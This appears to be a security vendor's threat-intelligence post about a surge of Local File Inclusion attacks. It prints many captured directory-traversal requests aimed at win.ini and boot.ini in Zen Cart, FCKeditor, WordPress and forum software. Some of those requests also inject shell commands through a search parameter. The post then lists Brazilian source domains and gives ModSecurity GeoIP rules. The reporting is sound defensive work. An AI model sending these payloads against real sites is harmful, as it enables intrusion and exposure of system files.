Our web sensors picked up a big uptick in Local File Inclusion (LFI) attacks today. We received 3675 attacks that targeted a wide range of applications all attempting to use directory traversals to access:
Here is a sampling of attack payloads:
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /wp-trackback.php?p=..........................................Windowswin.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=site_map&zenid=/boot.ini%00GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=featured_products&zenid=/boot.ini%00GET /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00GET /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00GET /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00GET /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=privacy&zenid=/boot.ini%00GET /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=conditions&zenid=/boot.ini%00GET /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00GET /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00GET /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=contact_us&zenid=/boot.ini%00GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=site_map&zenid=/boot.ini%00GET /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=gv_faq&zenid=/boot.ini%00GET /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00GET /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00GET /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=reviews&zenid=/boot.ini%00GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00GET /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=specials&zenid=/boot.ini%00GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00GET /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00GET /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=login&zenid=/boot.ini%00GET /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=featured_products&zenid=/boot.ini%00GET /index.php?showtopic=..........................................Windowswin.ini%00GET /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00
We identified this attack through two methods of our commercial rules feed:
After analyzing the source IP addresses, it was clear that this LFI attack campaign was orchestrated by attacker(s) in Brazil. Here is a listing of the Brazillian domains we identified:
ac.gov.br
aerotelecom.com.br
ampernet.com.br
atena.anhembi.ind.br
brma.santacasasp.org.br
cable.cabotelecom.com.br
cable.infolic.com.br
certelnet.com.br
cianetwork.com.br
claro.net.br
cpnet.com.br
customer.tdatabrasil.net.br
customer.telesp.net.br
dedicated.neoviatelecom.com.br
ded.intelignet.com.br
ded.srt.net.br
desktop.com.br
dezinternet.com.br
dial-up.telesp.net.br
din.wln.net.br
dsl.brasiltelecom.net.br
dsl.ccoce700.brasiltelecom.net.br
dsl.pmjce700.brasiltelecom.net.br
dsl.telesp.net.br
dynamic.adsl.gvt.net.br
dynamic.conectcor.com.br
dynamic.dialup.gvt.net.br
dynamic.idial.com.br
dynamic.neoviatelecom.com.br
e.brasiltelecom.net.br
e.ccoce700.brasiltelecom.net.br
e.pmjce700.brasiltelecom.net.br
fia.com.br
fw-cruz2.mma.com.br
gaccbahia.sdr.gvt.net.br
gate.futurecomp.com.br
geoposition.com.br
gw-acad-pf.upf.br
hc-gw.unicamp.br
host.gvt.net.br
http.kraftweb.com.br
ibys.com.br
i-next.psi.br
intercampo.com.br
interline.net.br
ip18.unb.org.br
ipd.brasiltelecom.net.br
ipd.brcentral.net.br
isa2.eptv.com.br
isp.timbrasil.com.br
itake.net.br
jupiter.sulpol.com.br
kratos.tdkom.psi.br
mail01.fundacaoaltinoventura.org.br
mail2.metroval.com.br
mail6.aralco.com.br
mail.aralco.com.br
mail.centraldopapel.com.br
mail.hci.ind.br
mail.nardini.ind.br
marinter.com.br
marte.ceron.com.br
mhnet.com.br
minasmaistelecom.com.br
mobile.jabursat.com.br
mx.0.rossi.com.br
neowave.com.br
nereu.vipway.net.br
nqt.com.br
ns1.vipel.ind.br
ns.argosguindastes.com.br
osprey2.certelnet.com.br
osprey.certelnet.com.br
p4net.com.br
poolip.BHE.embratel.net.br
prontonet.com.br
provale.com.br
proxy1.recife.pe.gov.br
rco.gvt.net.br
res-com.wayinternet.com.br
res-com.wayinternet.com.br
rline.com.br
sercomtel.com.br
server.smsr.com.br
servidor1.actioncentro.net.br
speedycti.com.br
srv.tecnolab.com.br
static.ctbctelecom.com.br
static.gotelecom.com.br
static.gvt.net.br
static.impsat.net.br
static.ntbr.com.br
static-pr082.redetelesul.com.br
static.spo.ctbc.com.br
static.starweb.net.br
static.stech.net.br
static-stz.convex.com.br
tcvnet.com.br
telemar.net.br
tpa.net.br
tpnet.psi.br
ufpa.br
uninetbsb.com.br
unotel.com.br
user.ajato.com.br
user.dynamic.dipelnet.com.br
user.superilinhares.com.br
user.superitelecom.com.br
user.veloxzone.com.br
user.vivozap.com.br
v4.naclick.com.br
veiculos.jelta.com.br
viacaboip.com.br
viaembratel.net.br
viafibra.com.br
virtua.com.br
wcs.net.br
web.ceralpisos.com.br
webmail.ro.senac.br
wifi.tcheturbo.com.br
wlan.lpnet.com.br
www2.ceralpisos.com.br
xd-dynamic.ctbcnetsuper.com.br
xdsl-dinamico.ctbcnetsuper.com.br
If you are using ModSecurity to protect your web applications, and your user-base does not normally originate in Brazil, you may want to consider implementing some GeoIP rules to help raise the potential Threat Score.
SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.datSecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"
This would raise the Threat Score for this transaction. You could, however, even block based solely on this information if you were sure that you have no legitimate clients from this geographic location. Simply change the "pass" action to "block".